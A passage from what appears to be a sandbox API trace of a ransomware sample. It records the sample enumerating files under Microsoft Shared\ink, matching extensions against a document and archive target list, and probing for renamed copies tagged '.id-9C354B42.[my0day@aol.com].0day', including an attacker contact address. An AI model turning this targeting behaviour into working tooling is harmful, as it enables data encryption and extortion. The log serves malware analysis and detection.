Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.473] lstrlenW (lpString=".doc") returned 4 [0266.473] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.473] lstrlenW (lpString=".docx") returned 5 [0266.473] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0266.473] lstrlenW (lpString=".pdf") returned 4 [0266.474] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.474] lstrlenW (lpString=".xls") returned 4 [0266.474] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.474] lstrlenW (lpString=".xlsx") returned 5 [0266.474] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0266.474] lstrlenW (lpString=".ppt") returned 4 [0266.474] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.474] lstrlenW (lpString=".zip") returned 4 [0266.474] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.474] lstrlenW (lpString=".rar") returned 4 [0266.474] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.474] lstrlenW (lpString=".bz2") returned 4 [0266.474] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.474] lstrlenW (lpString=".7z") returned 3 [0266.474] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.474] lstrlenW (lpString=".dbf") returned 4 [0266.474] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.474] lstrlenW (lpString=".1cd") returned 4 [0266.474] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0266.474] lstrlenW (lpString=".jpg") returned 4 [0266.474] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.474] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.474] lstrlenW (lpString="auxpad.xml") returned 10 [0266.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0266.475] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=212) returned 1 [0266.475] CloseHandle (hObject=0x308) returned 1 [0266.475] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0x20 [0266.475] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.475] lstrlenW (lpString=".doc") returned 4 [0266.475] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.475] lstrlenW (lpString=".docx") returned 5 [0266.475] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0266.475] lstrlenW (lpString=".pdf") returned 4 [0266.475] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.475] lstrlenW (lpString=".xls") returned 4 [0266.475] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.475] lstrlenW (lpString=".xlsx") returned 5 [0266.475] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0266.475] lstrlenW (lpString=".ppt") returned 4 [0266.475] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.475] lstrlenW (lpString=".zip") returned 4 [0266.475] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.475] lstrlenW (lpString=".rar") returned 4 [0266.475] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.475] lstrlenW (lpString=".bz2") returned 4 [0266.475] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.475] lstrlenW (lpString=".7z") returned 3 [0266.475] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.475] lstrlenW (lpString=".dbf") returned 4 [0266.475] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.475] lstrlenW (lpString=".1cd") returned 4 [0266.476] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.476] lstrlenW (lpString=".jpg") returned 4 [0266.476] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.476] lstrlenW (lpString=".doc") returned 4 [0266.476] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.476] lstrlenW (lpString=".docx") returned 5 [0266.476] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0266.476] lstrlenW (lpString=".pdf") returned 4 [0266.476] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.476] lstrlenW (lpString=".xls") returned 4 [0266.476] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.476] lstrlenW (lpString=".xlsx") returned 5 [0266.476] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0266.476] lstrlenW (lpString=".ppt") returned 4 [0266.476] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.476] lstrlenW (lpString=".zip") returned 4 [0266.476] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.476] lstrlenW (lpString=".rar") returned 4 [0266.476] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.476] lstrlenW (lpString=".bz2") returned 4 [0266.476] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.476] lstrlenW (lpString=".7z") returned 3 [0266.476] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.476] lstrlenW (lpString=".dbf") returned 4 [0266.476] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.476] lstrlenW (lpString=".1cd") returned 4 [0266.476] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0266.476] lstrlenW (lpString=".jpg") returned 4 [0266.476] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.477] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.477] lstrlenW (lpString="ea.xml") returned 6 [0266.477] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0266.715] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=384) returned 1 [0266.715] CloseHandle (hObject=0x2f0) returned 1 [0266.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0x20 [0266.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.716] lstrlenW (lpString=".doc") returned 4 [0266.716] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.716] lstrlenW (lpString=".docx") returned 5 [0266.716] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0266.716] lstrlenW (lpString=".pdf") returned 4 [0266.716] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.716] lstrlenW (lpString=".xls") returned 4 [0266.716] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.716] lstrlenW (lpString=".xlsx") returned 5 [0266.716] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0266.716] lstrlenW (lpString=".ppt") returned 4 [0266.716] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.716] lstrlenW (lpString=".zip") returned 4 [0266.716] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.716] lstrlenW (lpString=".rar") returned 4 [0266.716] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.716] lstrlenW (lpString=".bz2") returned 4 [0266.716] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.716] lstrlenW (lpString=".7z") returned 3 [0266.716] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.716] lstrlenW (lpString=".dbf") returned 4 [0266.716] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.717] lstrlenW (lpString=".1cd") returned 4 [0266.717] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.717] lstrlenW (lpString=".jpg") returned 4 [0266.717] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.717] lstrlenW (lpString=".doc") returned 4 [0266.717] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.717] lstrlenW (lpString=".docx") returned 5 [0266.717] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0266.717] lstrlenW (lpString=".pdf") returned 4 [0266.717] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.717] lstrlenW (lpString=".xls") returned 4 [0266.717] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.717] lstrlenW (lpString=".xlsx") returned 5 [0266.717] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0266.717] lstrlenW (lpString=".ppt") returned 4 [0266.717] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.717] lstrlenW (lpString=".zip") returned 4 [0266.717] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.717] lstrlenW (lpString=".rar") returned 4 [0266.717] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.717] lstrlenW (lpString=".bz2") returned 4 [0266.717] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.718] lstrlenW (lpString=".7z") returned 3 [0266.718] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.718] lstrlenW (lpString=".dbf") returned 4 [0266.718] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.718] lstrlenW (lpString=".1cd") returned 4 [0266.718] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0266.718] lstrlenW (lpString=".jpg") returned 4 [0266.718] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.718] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.718] lstrlenW (lpString="oskmenubase.xml") returned 15 [0266.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0266.721] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=471) returned 1 [0266.721] CloseHandle (hObject=0x304) returned 1 [0266.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml")) returned 0x20 [0266.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.721] lstrlenW (lpString=".doc") returned 4 [0266.721] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.721] lstrlenW (lpString=".docx") returned 5 [0266.721] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0266.722] lstrlenW (lpString=".pdf") returned 4 [0266.722] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.722] lstrlenW (lpString=".xls") returned 4 [0266.722] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.722] lstrlenW (lpString=".xlsx") returned 5 [0266.722] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0266.722] lstrlenW (lpString=".ppt") returned 4 [0266.722] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.722] lstrlenW (lpString=".zip") returned 4 [0266.722] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.722] lstrlenW (lpString=".rar") returned 4 [0266.722] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.722] lstrlenW (lpString=".bz2") returned 4 [0266.722] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.722] lstrlenW (lpString=".7z") returned 3 [0266.722] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.722] lstrlenW (lpString=".dbf") returned 4 [0266.722] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.722] lstrlenW (lpString=".1cd") returned 4 [0266.722] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.722] lstrlenW (lpString=".jpg") returned 4 [0266.722] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.722] lstrlenW (lpString=".doc") returned 4 [0266.722] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.722] lstrlenW (lpString=".docx") returned 5 [0266.722] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0266.722] lstrlenW (lpString=".pdf") returned 4 [0266.722] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.723] lstrlenW (lpString=".xls") returned 4 [0266.723] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.723] lstrlenW (lpString=".xlsx") returned 5 [0266.723] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0266.723] lstrlenW (lpString=".ppt") returned 4 [0266.723] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.723] lstrlenW (lpString=".zip") returned 4 [0266.723] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.723] lstrlenW (lpString=".rar") returned 4 [0266.723] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.723] lstrlenW (lpString=".bz2") returned 4 [0266.723] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.723] lstrlenW (lpString=".7z") returned 3 [0266.723] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.723] lstrlenW (lpString=".dbf") returned 4 [0266.723] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.723] lstrlenW (lpString=".1cd") returned 4 [0266.723] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 88 [0266.723] lstrlenW (lpString=".jpg") returned 4 [0266.723] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.723] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.724] lstrlenW (lpString="oskmenu.xml") returned 11 [0266.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0266.725] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=215) returned 1 [0266.725] CloseHandle (hObject=0x308) returned 1 [0266.725] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml")) returned 0x20 [0266.725] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.725] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0266.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0266.725] lstrlenW (lpString=".doc") returned 4 [0266.725] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.725] lstrlenW (lpString=".docx") returned 5 [0266.725] lstrcmpiW (lpString1=".docx", lpString2="u.xml") returned -1 [0266.725] lstrlenW (lpString=".pdf") returned 4 [0266.725] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.725] lstrlenW (lpString=".xls") returned 4 [0266.725] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.726] lstrlenW (lpString=".xlsx") returned 5 [0266.726] lstrcmpiW (lpString1=".xlsx", lpString2="u.xml") returned -1 [0266.726] lstrlenW (lpString=".ppt") returned 4 [0266.726] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0266.726] lstrlenW (lpString=".zip") returned 4 [0266.726] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.726] lstrlenW (lpString=".rar") returned 4 [0266.726] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.726] lstrlenW (lpString=".bz2") returned 4 [0266.726] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.726] lstrlenW (lpString=".7z") returned 3 [0266.726] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0266.726] lstrlenW (lpString=".dbf") returned 4 [0266.726] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0266.726] lstrlenW (lpString=".1cd") returned 4 [0266.726] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0266.726] lstrlenW (lpString=".jpg") returned 4 [0266.726] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0266.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0266.727] lstrlenW (lpString=".doc") returned 4 [0266.727] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.727] lstrlenW (lpString=".docx") returned 5 [0266.727] lstrcmpiW (lpString1=".docx", lpString2="u.xml") returned -1 [0266.727] lstrlenW (lpString=".pdf") returned 4 [0266.727] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.727] lstrlenW (lpString=".xls") returned 4 [0266.727] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.727] lstrlenW (lpString=".xlsx") returned 5 [0266.727] lstrcmpiW (lpString1=".xlsx", lpString2="u.xml") returned -1 [0266.727] lstrlenW (lpString=".ppt") returned 4 [0266.727] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0266.727] lstrlenW (lpString=".zip") returned 4 [0266.727] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.727] lstrlenW (lpString=".rar") returned 4 [0266.727] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.727] lstrlenW (lpString=".bz2") returned 4 [0266.727] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.727] lstrlenW (lpString=".7z") returned 3 [0266.727] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0266.727] lstrlenW (lpString=".dbf") returned 4 [0266.727] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0266.727] lstrlenW (lpString=".1cd") returned 4 [0266.727] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 